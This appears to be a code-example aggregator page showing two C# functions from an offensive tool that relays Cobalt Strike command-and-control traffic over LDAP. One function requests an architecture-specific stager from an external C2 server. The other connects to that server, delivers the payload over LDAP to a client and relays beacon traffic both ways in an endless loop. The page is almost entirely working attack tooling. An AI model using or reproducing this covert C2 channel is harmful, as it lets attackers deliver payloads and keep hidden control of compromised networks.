Ejemplo n.º 1
0
        public static byte[] getStage(Transport.Relayer Relayer, string pipename, bool isX64)
        {
            var arch = isX64 ? "x64" : "x86";

            Misc.WriteGood(string.Format("Requesting stager..."));
            Relayer.Send(Encoding.ASCII.GetBytes("arch=" + arch));
            Relayer.Send(Encoding.ASCII.GetBytes("pipename=" + pipename));
            Relayer.Send(Encoding.ASCII.GetBytes("block=100"));
            Relayer.Send(Encoding.ASCII.GetBytes("go"));


            // Sleep a little so the TS can process the request
            System.Threading.Thread.Sleep(200);

            byte[] payload = Relayer.ReadFrame();
            Misc.WriteGood(string.Format("Received stager ({0} KB)", payload.Length / 1024));

            return(payload);
        }
Ejemplo n.º 2
0
        /// <summary>
        /// Handles the logic for communicating with the client over LDAP en transporting it to our C2 server
        /// </summary>
        static void Server()
        {
            // amount of sleep between polling
            int sleepInterval = 50;

            // connect to external C2
            Core.Transport.Relayer Relayer = new Core.Transport.Relayer(SERVER_IP, SERVER_PORT);
            if (Relayer.IsConnected)
            {
                Misc.WriteGood(string.Format("Connected to {0}:{1}", SERVER_IP, SERVER_PORT));
            }
            else
            {
                Console.WriteLine("[-] Cannot connect to {0}:{1}", SERVER_IP, SERVER_PORT);
                return;
            }

            // Initiate LDAP connection
            Core.LDAP LDAPConnection = integratedAuth ?
                                       new Core.LDAP(IsClient, UseLDAPS) :
                                       new Core.LDAP(username, password, domain, IsClient, UseLDAPS);

            if (!LDAPConnection.TestLDAPConnection())
            {
                Console.WriteLine("[-] Cannot connect to LDAP with the information provided.");
                return;
            }

            if (!LDAPConnection.AutoDiscover())
            {
                return;
            }

            // receive stager from C2
            var payload = Stage.getStage(Relayer, LDAPConnection.pipeName, LDAPConnection.isX64);

            Misc.WriteGood(string.Format("Payload received. Payload size: {0}KB", payload.Length / 1024));

            // Send payload over LDAP to third party client
            Misc.WriteGood(string.Format("Sending payload over LDAP..."));
            LDAPConnection.Send(payload);

            // run indefintely
            bool run            = true;
            bool readController = false;

            do
            {
                // Handle LDAP connection
                byte[] data = LDAPConnection.Receive();
                if (data != null)
                {
                    Misc.WriteGood(string.Format("Relaying {0} bytes from LDAP to CS", data.Length));

                    // Send data over LDAP to controller
                    Relayer.Send(data);
                    readController = true;
                }
                else
                {
                    System.Threading.Thread.Sleep(sleepInterval);
                }

                // Wait for CS / LDAP
                if (!readController)
                {
                    continue;
                }

                // Handle CS connection
                data = Relayer.ReadFrame();
                if (data != null)
                {
                    Misc.WriteGood(string.Format("Relaying {0} bytes data from CS to LDAP", data.Length));
                    LDAPConnection.Send(data);
                    readController = false;
                }
                else
                {
                    System.Threading.Thread.Sleep(sleepInterval);
                }
            } while (run);
        }